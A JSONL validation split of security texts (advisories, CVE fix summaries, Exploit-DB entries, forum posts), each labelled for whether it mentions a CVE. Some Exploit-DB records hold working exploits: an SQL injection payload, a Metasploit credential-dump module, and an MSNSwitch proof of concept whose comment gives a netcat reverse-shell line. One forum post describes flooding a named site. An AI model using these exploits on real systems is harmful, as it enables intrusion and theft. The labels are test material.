+{"id": "a973a0acea3020ab84d5", "text": "redis-py Race Condition vulnerability\n\n[Severity: MEDIUM]\n\nredis-py before 4.5.3, as used in ChatGPT and other products, leaves a connection open after canceling an async Redis command at an inopportune time (in the case of a pipeline operation), and can send response data to the client of an unrelated request in an off-by-one manner. The fixed versions for this CVE Record are 4.3.6, 4.4.3, and 4.5.3, but [are believed to be incomplete](https://github.com/redis/redis-py/issues/2665). CVE-2023-28859 has been assigned the issues caused by the incomplete fixes.", "source": "github_advisory", "timestamp": "2023-03-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e68b2003869a04a9aabd", "text": "There are six entries on the list with four different user names. You will be able to exclude two of them without further ado. So there are two possible answers left. If you start at the top, you won’t need a second try", "source": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0762b71795bab2ed17f4", "text": "Best Online Course to Learn Python\n\nHi this is Palak Sharma. I have completed my engineering and lots of programming languages I learn from here. Python is also my favorite programming language however it was not part of our syllabus but I learn little bit about Python Programming Language from internet. Now I want to enhance my skills and my coding in this programming language, can anyone suggest some best online courses for learning Python Programming Language. Waiting for some positive responses. Thanks", "source": "go4expert", "timestamp": "2022-09-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4982ef87315c637b4a50", "text": "Nmap analysis on kali by being annonymous\n\nHello, I am new to the pen test. I have slight knowledge in network and system, title pro sys and network… so slight knowledge in routing, osi model and a bit of linux but I forgot a lot. -So I wanted to attempt a flood and penetration on a test site. which is weird to access the ip I ping the site and tracert I get an ip that goes from 96 to 97 on the penultimate byte during my floods. However when I type the ip on the internet browser I come across a cloudfare page (I imagine the cloud server that hosts the site?). So is it still effective when trying to flood via metasploit? The site remains very active so I imagine that there is a minimum of security (I had made one at a time via ufw 3 months ago for the anti back). -Furthermore, during an nmap it is sometimes noted that all the ports are in ignored state!!!??? but then how is it possible that the site is accessible on the internet!? For example I can have during my first nmap results of ports but during the second scan there is nothing more detected: ──(root㉿kali)-[~] └─# proxychains nmap 188.114.97.* [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 22:19 CEST Nmap scan report for 188.114.97.* Host is up (0.016s latency). Not shown: 996 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 443/tcp open https 8080/tcp open http-proxy 8443/tcp open https-alt Nmap done: 1 IP address (1 host up) scanned in 53.07 seconds ┌──(root㉿kali)-[~] └─# proxychains nmap -sV 188.114.97.* [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 22:21 CEST Nmap scan report for 188.114.97.$ Host is up (0.0020s latency). All 1000 scanned ports on 188.114.97.* are in ignored states. Not shown: 1000 filtered tcp ports (no-response) Service detection performed. Please report any incorrect results at Nmap OS/Service Fingerprint and Correction Submission Page . Nmap done: 1 IP address (1 host up) scanned in 11.49 seconds -Finally, it s weird, with “nmap -sV” without typing ‘‘proxychians’’ first on the other ip adress, i found service “tcpwrapped” but i didn’t found any vulnerabilitie on metasploit. Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-24 18:40 CEST Nmap scan report for davidduke.com (188.114.96. ) Host is up (0.013s latency). Other addresses for davidduke.com (not scanned): 188.114.97. **06:98c1:3120> Not shown: 997 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open tcpwrapped 443/tcp open tcpwrapped 8080/tcp open tcpwrapped Service detection performed. Please report any incorrect results at https://> Nmap done: 1 IP address (1 host up) scanned in 72.63 seconds Thanks. sorry english is not my mothertongue.", "source": "hackersploit", "timestamp": "2022-07-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a91e0120a14acff1d6cc", "text": ".NET Denial of Service Vulnerability\n\n[Severity: HIGH]\n\n# Microsoft Security Advisory CVE-2023-38178: .NET Denial of Service Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists in .NET Kestrel where a malicious client can bypass QUIC stream limit in HTTP/3 in both ASP.NET and .NET runtimes resulting in denial of service.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/268\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 7.0 application running on .NET 7.0.9 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n\n### .NET 7\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/ Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.9 | 7.0.10\n\n### .NET 6\n.NET 6 included HTTP/3 support as a [preview feature](https://learn.microsoft.com/dotnet/core/extensions/httpclient-http3#http3-support-in-net-6) , which requires specific opt-in code. If you are using HTTP/3 in .NET 6 you must update your application to .NET 7, where the feature is supported, to fix the vulnerability. Future versions of .NET will disable the preview feature entirely.\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* To fix this issue on Linux, please update `libmsquic` to 2.2+\n* If you are using one of the affected packages, please update to the patched version listed above.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 7.0.400\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 7.0.10\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 7.0.400 [C:\\Program Files\\dotnet\\sdk]\n", "source": "github_advisory", "timestamp": "2023-08-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9dbfa3c4430b976654ed", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0673, CVE-2020-0674, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713, CVE-2020-0767.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ae4b1ccf4367eaffd159", "text": "CVE: CVE-2022-34132\n\n[{'lang': 'en', 'value': 'Benjamin BALET Jorani v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at application/controllers/Leaves.php.'}]\n\nFix commit: BF:Prevent SQL injection fix #369", "source": "cvefixes", "timestamp": "2022-06-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ef723f1e203f4921e0d4", "text": "CVE: CVE-2022-0574\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository publify/publify prior to 9.2.8.'}]\n\nFix commit: Do not allow comments on Article if not published", "source": "cvefixes", "timestamp": "2022-05-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "581437bada02bb445c69", "text": "CVE: CVE-2022-0831\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.3.3.'}]\n\nFix commit: escaping 'key' custom property field in elements", "source": "cvefixes", "timestamp": "2022-03-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "adc2b9435b78c2f9163f", "text": "I don’t know why but it’s not advisable to use “${ #var }”, using other methods to obtain the length of $var it worked perfectly!!!", "source": "hackthebox", "timestamp": "2023-01-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "83ce4ec7777c008ada86", "text": "Records cannot be updated because it is a read-only format. It is connection-oriented; whenever data is retrieved from a database, a connection is required. Since it's in read-only format, we can't update it. Data Reader is used to read data from databases, and its connection-oriented architecture is read-only while fetching data from databases. When compared to a dataset, a data reader will retrieve the data quite quickly. Typically, we'll connect data to a data reader using an Execute Reader object. Where as Data Table represents a single table in the database It has rows and columns. There is no much difference between dataset and data table, Dataset is simply the collection of data tables. A single database table is represented by a Data Table. It has columns and rows. Datasets and data tables are nearly identical; a dataset is essentially a collection of data tables.", "source": "go4expert", "timestamp": "2023-02-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ede6a8d3fcbce5b6e46e", "text": "ChakraCore vulnerable to remote code execution\n\n[Severity: HIGH]\n\nChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". `Op_MaxInAnArray` and `Op_MinInAnArray` can explicitly call user defined JavaScript functions, potentially leading to remote code execution.\n\nThis CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d5bcbbd852ffa6494418", "text": "Just so its 100% clear: The question regarding the name of the image file (w/ hint: file.jpg) utilizes the Wireshark-Lab-2.pcap file. The question regarding the name of the user who is acting maliciously utilizes the packet capture data from the target device you spawn and then rdp into the capture VM. Do not mix them up, and be aware that these two questions use different resources for their answer.", "source": "hackthebox", "timestamp": "2022-09-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9c21340510c93d5d7288", "text": "Something that I found was to go with the hint provided for the first question in the service login. I ran my possible username through Metasploit and got a correct hit on the username. First is that I was able to get the last challenge in under 2 hrs. Use First Name and Last Name only when generating the user list. Use Fist Name and Last Name when generating the Password list and include 1337 When in look at the Netstat and you will see something missing. Never overlook the obvious", "source": "hackthebox", "timestamp": "2022-09-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d23c9c74b4a81ce09f04", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows remote code execution, due to how the Chakra scripting engine handles objects in memory, aka \"Chakra Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2018-0872, CVE-2018-0873, CVE-2018-0930, CVE-2018-0931, CVE-2018-0933, CVE-2018-0934, CVE-2018-0936, and CVE-2018-0937.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b3b74ce24c6bca098570", "text": "Monitor mode on a HP EliteBook by defualt\n\nBefore I start this post i just wanna say this isn’t an issue with Parrot OS itself, just something weird. I recently dual booted my HP EliteBook 850 G7 Notebook with parrot OS KDE. All was fine until I decided I wanted to do some monitor mode scanning with my adapter. I have an Ar9271 adapter I got off Ali Express but just for fun I wanted to see if I could set my internal wifi card to moniter mode. I used airmon-ng to do this and viola! it did actually set into monitor mode. I tried scaning my network using airodump-ng and tested it using the cmd aireplay-ng --test, that also worked fine. All this time I didn’t have my external card plugged in, so I was sure I wasn’t accidently scanning off that. My question is, how tf is my internal wifi card able to bet set in monitor mode without any patch’s or drivers. I’v put my laptop model in the paragraph above, and I could not find anyone who has experienced this. So is this weird or does everyone have this but no one uses it?", "source": "parrotsec", "timestamp": "2022-02-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ee5141883f314aca4d98", "text": "CVE: CVE-2022-29252\n\n[{'lang': 'en', 'value': 'XWiki Platform Wiki UI Main Wiki is a package for managing subwikis. Starting with version 5.3-milestone-2, XWiki Platform Wiki UI Main Wiki contains a possible cross-site scripting vector in the `WikiManager.JoinWiki ` wiki page related to the \"requestJoin\" field. The issue is patched in versions 12.10.11, 14.0-rc-1, 13.4.7, and 13.10.3. The easiest available workaround is to edit the wiki page `WikiManager.JoinWiki` (with wiki editor) according to the suggestion provided in the GitHub Security Advisory.'}]\n\nFix commit: XWIKI-19292: Fix bad escaping", "source": "cvefixes", "timestamp": "2022-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7b5852f53450c1109359", "text": "If you were able to get flag4 use that shell to upgrade to an interactive shell as others mentioned. Or use “Meterpreter”, and look for other local exploits provided by “msf”.", "source": "hackthebox", "timestamp": "2023-02-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a4d06bd1b8bf59254da6", "text": "CVE: CVE-2022-21728\n\n[{'lang': 'en', 'value': \"Tensorflow is an Open Source Machine Learning Framework. The implementation of shape inference for `ReverseSequence` does not fully validate the value of `batch_dim` and can result in a heap OOB read. There is a check to make sure the value of `batch_dim` does not go over the rank of the input, but there is no check for negative values. Negative dimensions are allowed in some cases to mimic Python's negative indexing (i.e., indexing from the end of the array), however if the value is too negative then the implementation of `Dim` would access elements before the start of an array. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.\"}]\n\nFix commit: Fix out of bound error in ReverseSequence Op shape function\n\nPiperOrigin-RevId: 411896080\nChange-Id: I7e59a38e2f960886edf2b6c54ed5a84e86a9b193", "source": "cvefixes", "timestamp": "2022-02-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "3a01de15be917dd5467f", "text": "CVE: CVE-2022-1699\n\n[{'lang': 'en', 'value': 'Uncontrolled Resource Consumption in GitHub repository causefx/organizr prior to 2.1.2000. This vulnerability can be abused by doing a DDoS attack for which genuine users will not able to access resources/applications.'}]\n\nFix commit: fix more lengths of user inputs", "source": "cvefixes", "timestamp": "2022-05-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4234a3d5506cdfef17ef", "text": "Hospital Management Startup 1.0 - 'Multiple' SQLi\n\n# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi\n# Exploit Author: nu11secur1ty\n# Date: 02.10.2022\n# Vendor: https://github.com/kabirkhyrul\n# Software: https://github.com/kabirkhyrul/HMS\n# CVE-2022-23366\n\n# Description:\nThe loginid and password parameters from Hospital Management Startup\n1.0 appear to be vulnerable to SQL injection attacks.\nThe attacker can retrieve all information from the administrator\naccount of the system and he can use the information for malicious\npurposes!\nWARNING: If this is in some external domain, or some subdomain, or\ninternal, this will be extremely dangerous!\n\nStatus: CRITICAL\n\n\n[+] Payloads:\n\n```mysql\n---\nParameter: loginid (POST)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND\n(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND\n'sDHP'='sDHP&rememberme=on&submit=Login\n---\n\n```\n# Reproduce:\nhttps://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366", "source": "exploitdb", "timestamp": "2022-02-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "520133a0401451c88983", "text": "By following the password requirements and applying RegEx-Filters on Rockyou30, not a single compliant password is left in this list. I am supposed to use Rockyou30 for this task, but this password list is not consistent with these password policies.", "source": "hackthebox", "timestamp": "2022-01-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "88e9488d3614fab8519a", "text": "Jetty Directory Traversal Vulnerability\n\n[Severity: MEDIUM]\n\nDirectory traversal vulnerability in jetty 6.0.x (jetty6) beta16 allows remote attackers to read arbitrary files via a `%2e%2e%5c` (encoded `../`) in the URL. NOTE: this might be the same issue as CVE-2005-3747.", "source": "github_advisory", "timestamp": "2022-05-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1454eb29f20206913e6e", "text": "Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/mqtt'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::MQTT\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)',\n 'Description' => %q(\n This module exploits MQTT creds dump vulnerability in Servisnet Tessa.\n\t\tThe app.js is publicly available which acts as the backend of the application.\n By exposing a default value for the \"Authorization\" HTTP header,\n it is possible to make unauthenticated requests to some areas of the application.\n Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.\n A new admin user can be added to the database with this header obtained in the source code.\n\n The module tries to log in to the MQTT service with the credentials it has obtained,\n and reflects the response it receives from the service.\n\n ),\n 'References' =>\n [\n [ 'CVE', 'CVE-2022-22833' ],\n [ 'URL', 'https://pentest.com.tr/exploits/Servisnet-Tessa-MQTT-Credentials-Dump-Unauthenticated.html' ],\n [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]\n ],\n 'Author' =>\n [\n 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Dec 22 2021\",\n 'DefaultOptions' =>\n {\n 'RPORT' => 443,\n 'SSL' => true\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path for application', '/'])\n ])\n end\n # split strings to salt\n def split(data, string_to_split)\n word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n string = word.split('\"]').join('').split('[\"').join('')\n return string\n end\n\n def check_mqtt\n res = send_request_cgi({\n # default.a.get( check\n 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),\n\t 'method' => 'GET'\n })\n\n if res && res.code == 200 && res.body =~ /connectionMQTT/\n data = res.body\n #word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n mqtt_host = data.scan(/host: '([\\S\\s]*?)'/)[0][0]\n rhost = mqtt_host.split('mqtts://').join('')\n print_status(\"MQTT Host: #{mqtt_host}\")\n mqtt_port = data.scan(/port: ([\\S\\s]*?),/)[0][0]\n print_status(\"MQTT Port: #{mqtt_port}\")\n mqtt_end = data.scan(/endpoint: '([\\S\\s]*?)'/)[0][0]\n print_status(\"MQTT Endpoint: #{mqtt_end}\")\n mqtt_cl = data.scan(/clientId: '([\\S\\s]*?)'/)[0][0]\n print_status(\"MQTT clientId: #{mqtt_cl}\")\n mqtt_usr = data.scan(/username: '([\\S\\s]*?)'/)[1][0]\n print_status(\"MQTT username: #{mqtt_usr}\")\n mqtt_pass = data.scan(/password: '([\\S\\s]*?)'/)[1][0]\n print_status(\"MQTT password: #{mqtt_pass}\")\n\n print_status(\"##### Starting MQTT login sweep #####\")\n\n # Removed brute force materials that can be included for the collection.\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n password: mqtt_pass,\n username: mqtt_usr\n )\n # this definition already exists in \"auxiliary/scanner/mqtt/connect\". Moved into exploit.\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::MQTT.new(\n host: rhost,\n port: mqtt_port,\n read_timeout: datastore['READ_TIMEOUT'],\n client_id: client_id,\n proxies: datastore['PROXIES'],\n cred_details: cred_col", "source": "exploitdb", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f8b5589b6b428183aeff", "text": "f there is still an opening, I’d like a chance to join. I have been doing most of this stuff solo, would love to get more involved. DM me if this is still available.", "source": "hackthebox", "timestamp": "2022-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7e4d769c2b09e146af22", "text": "CVE: CVE-2022-1173\n\n[{'lang': 'en', 'value': 'stored xss in GitHub repository getgrav/grav prior to 1.7.33.'}]\n\nFix commit: Fixed XSS check not detecting onX events without quotes", "source": "cvefixes", "timestamp": "2022-04-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f838a02a1f240604a0e9", "text": "MoinMoin Access Restrictions Bypassed due to improper ACL enforcement\n\n[Severity: HIGH]\n\nMoinMoin 1.6.2 and 1.7 does not properly enforce ACL checks when acl_hierarchic is set to True, which might allow remote attackers to bypass intended access restrictions, a different vulnerability than CVE-2008-1937.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "04d0dfc2db0634114074", "text": "Welcome to the forums, why Linux fails to install [generic answer] Corrupt download [did you check the SHA sum], Bad burn to the pen-drive[ Rufus has not been playing well with all Linux for a while, try Balena Etcher] Defective pen-drive [use a good quality branded drive formatted XFats]", "source": "parrotsec", "timestamp": "2023-01-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "6a93bd47bde882a10426", "text": "CVE: CVE-2022-24761\n\n[{'lang': 'en', 'value': \"Waitress is a Web Server Gateway Interface server for Python 2 and 3. When using Waitress versions 2.1.0 and prior behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends. This would allow requests to be smuggled via the front-end proxy to waitress and later behavior. There are two classes of vulnerability that may lead to request smuggling that are addressed by this advisory: The use of Python's `int()` to parse strings into integers, leading to `+10` to be parsed as `10`, or `0x01` to be parsed as `1`, where as the standard specifies that the string should contain only digits or hex digits; and Waitress does not support chunk extensions, however it was discarding them without validating that they did not contain illegal characters. This vulnerability has been patched in Waitress 2.1.1. A workaround is available. When deploying a proxy in front of waitress, turning on any and all functionality to make sure that the request matches the RFC7230 standard. Certain proxy servers may not have this functionality though and users are encouraged to upgrade to the latest version of waitress instead.\"}]\n\nFix commit: Merge pull request from GHSA-4f7p-27jc-3c36\n\nFix for HTTP request smuggling due to incorrect validation", "source": "cvefixes", "timestamp": "2022-03-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "857570ff769f192e4e85", "text": "Simple web-based relational database system\n\nHello all, We have just launched a startup. Now, we are looking for a simple web-based relational database system where we can easily add tables and connect them to one another through foreign keys. For example, we would want to create a suppliers database in which we could perform a query such as \"show me 1. all suppliers 2. for a certain product type 3. which is based in a certain region 4. and offers the product type within a certain price range\". We are a team of five which means the database should be accessible for 5 people through a web interface. We know the basics of database modeling. But unfortunately, none of us is experienced in writing (my)SQL code. Thus, we would wish to find a system that comes with a tool-based development environment. Eventually, our budget is limited and we, therefore, would prefer a cheap system over an expensive one. We would appreciate any ideas from you", "source": "go4expert", "timestamp": "2022-03-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "188f0a56dbf183c0a75e", "text": "So the command kept timing out for me. I know this is probably a rookie mistake, but for anyone else who’s struggling with this, I eventually got it to work using ssh://SERVER_IP:SERVER_PORT instead of ssh://SERVER_IP:22 as described in the HTB guides (unless I misread it).", "source": "hackthebox", "timestamp": "2022-11-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4a728b234c3951c3b3fc", "text": "CVE: CVE-2022-1381\n\n[{'lang': 'en', 'value': 'global heap buffer overflow in skip_range in GitHub repository vim/vim prior to 8.2.4763. This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution'}]\n\nFix commit: patch 8.2.4763: using invalid pointer with \"V:\" in Ex mode\n\nProblem: Using invalid pointer with \"V:\" in Ex mode.\nSolution: Correctly handle the command being changed to \"+\".", "source": "cvefixes", "timestamp": "2022-04-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8a29b951ab7f6cbf75cf", "text": "undici before v5.8.0 vulnerable to CRLF injection in request headers\n\n[Severity: MEDIUM]\n\n### Impact\n\nIt is possible to inject CRLF sequences into request headers in Undici.\n\n```js\nconst undici = require('undici')\n\nconst response = undici.request(\"http://127.0.0.1:1000\", {\n headers: {'a': \"\\r\\nb\"}\n})\n```\n\nThe same applies to `path` and `method`\n\n### Patches\n\nUpdate to v5.8.0\n\n### Workarounds\n\nSanitize all HTTP headers from untrusted sources to eliminate `\\r\\n`.\n\n### References\n\nhttps://hackerone.com/reports/409943\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12116\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n* To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n", "source": "github_advisory", "timestamp": "2022-07-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9f6ae42961d745b68c08", "text": "A small hint for the second users flag.txt. Read your netstat output carefully and you will notice that there is a different ip adress for ftp.", "source": "hackthebox", "timestamp": "2022-03-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "357a266c3fe5871710a1", "text": "MSNSwitch Firmware MNT.2408 - Remote Code Execution\n\nExploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)\nGoogle Dork: n/a\nDate:9/1/2022\nExploit Author: Eli Fulkerson\nVendor Homepage: https://www.msnswitch.com/\nVersion: MNT.2408\nTested on: MNT.2408 firmware\nCVE: CVE-2022-32429\n\n#!/usr/bin/python3\n\n\n\"\"\"\n\nPOC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.\n\nConfiguration dump only requires HTTP access.\nFull RCE requires you to be on the same subnet as the device.\n\n\"\"\"\n\nimport requests\nimport sys\nimport urllib.parse\nimport readline\nimport random\nimport string\n\n\n# listen with \"ncat -lk {LISTENER_PORT}\" on LISTENER_HOST\nLISTENER_HOST = \"192.168.EDIT.ME\"\nLISTENER_PORT = 3434\n\n# target msnswitch\nTARGET=\"192.168.EDIT.ME2\"\nPORT=80\n\nUSERNAME = None\nPASSWORD = None\n\n\"\"\"\nFirst vulnerability, unauthenticated configuration/credential dump\n\"\"\"\nif USERNAME == None or PASSWORD == None:\n\t# lets just ask\n\thack_url=f\"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh\"\n\tsession = requests.session()\n\n\tdata = session.get(hack_url)\n\tfor each in data.text.split('\\n'):\n\t\tkey = None\n\t\tval = None\n\n\t\ttry:\n\t\t\tkey = each.strip().split('=')[0]\n\t\t\tval = each.strip().split('=')[1]\n\t\texcept:\n\t\t\tpass\n\n\t\tif key == \"Account1\":\n\t\t\tUSERNAME = val\n\t\tif key == \"Password1\":\n\t\t\tPASSWORD = val\n\n\"\"\"\nSecond vulnerability, authenticated command execution\n\nThis only works on the local lan.\n\nfor full reverse shell, modify and upload netcat busybox shell script to /tmp:\n\n\tshell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f\n\tdownload to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp\n\nref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox\n\"\"\"\n\nsession = requests.session()\n\n# initial login, establishes our Cookie\nburp0_url = f\"http://{TARGET}:{PORT}/goform/login\"\nburp0_headers = {\"Cache-Control\": \"max-age=0\", \"Upgrade-Insecure-Requests\": \"1\", \"Origin\": f\"http://{TARGET}\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 